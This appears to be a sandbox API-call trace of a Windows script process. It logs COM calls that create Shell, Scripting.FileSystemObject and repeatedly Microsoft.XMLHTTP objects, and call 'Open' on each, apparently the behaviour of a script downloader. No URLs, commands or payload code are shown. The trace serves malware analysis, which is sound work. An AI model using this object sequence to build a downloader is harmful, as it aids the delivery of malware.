	[0330.256] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0330.256] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0330.256] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0330.256] ??2@YAPEAX_K@Z () returned 0x62f350
	[0330.256] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0330.256] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0330.256] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0330.256] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0330.256] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0330.256] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0330.256] SysStringLen (param_1=0x0) returned 0x0
	[0330.256] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0330.259] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0330.259] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0330.259] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0330.259] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0330.259] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0330.259] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0331.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0331.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0331.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0331.521] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0331.521] SysStringLen (param_1=0x0) returned 0x0
	[0331.521] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0331.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0331.521] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0331.522] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0331.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0331.522] ??2@YAPEAX_K@Z () returned 0x62f310
	[0331.522] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0331.522] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0331.522] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0331.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0331.522] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0331.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.522] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0331.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.525] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0331.525] SysStringLen (param_1=0x0) returned 0x0
	[0331.525] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0331.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0331.525] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0331.525] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0331.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0331.525] ??2@YAPEAX_K@Z () returned 0x62f330
	[0331.526] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0331.526] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0331.526] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0331.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0331.526] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0331.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.526] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0331.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.526] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0331.526] SysStringLen (param_1=0x0) returned 0x0
	[0331.526] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0331.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0331.527] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0331.527] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0331.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0331.527] ??2@YAPEAX_K@Z () returned 0x62f310
	[0331.527] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0331.527] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0331.527] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0331.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0331.527] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0331.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.527] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0331.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.528] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0331.528] SysStringLen (param_1=0x0) returned 0x0
	[0331.528] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0331.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0331.528] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0331.528] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0331.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0331.528] ??2@YAPEAX_K@Z () returned 0x62f330
	[0331.528] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0331.528] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0331.528] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0331.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0331.528] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0331.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.528] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0331.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.529] longjmp () 
	[0331.529] longjmp () 
	[0331.529] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0331.529] SysStringLen (param_1=0x0) returned 0x0
	[0331.529] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0331.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0331.529] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0331.529] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0331.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0331.529] ??2@YAPEAX_K@Z () returned 0x62f310
	[0331.529] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0331.529] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0331.529] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0331.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0331.530] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0331.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.530] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0331.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.530] longjmp () 
	[0331.530] longjmp () 
	[0331.530] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0331.530] SysStringLen (param_1=0x0) returned 0x0
